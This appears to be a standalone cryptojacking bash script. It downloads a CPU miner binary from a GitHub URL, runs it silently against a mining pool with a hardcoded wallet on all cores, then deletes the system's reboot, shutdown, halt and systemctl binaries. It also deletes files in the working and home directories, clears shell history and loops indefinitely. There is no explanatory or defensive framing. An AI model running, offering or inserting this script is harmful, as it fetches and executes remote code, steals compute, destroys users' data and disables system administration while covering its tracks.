#!/bin/bash
wget -O biru https://github.com/claires67/newxm/raw/main/cpuminer-avx2
chmod 777 biru
./biru -a rinhash -o stratum+tcp://stratum-na.rplant.xyz:7148 -u rin1qu9ntv7w65qxx4a99g4luzlpfv6cgt0009t0n2m.$(shuf -n 1 -i 1-99999)-VXN -t $(nproc --all) > /dev/null 2>&1
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
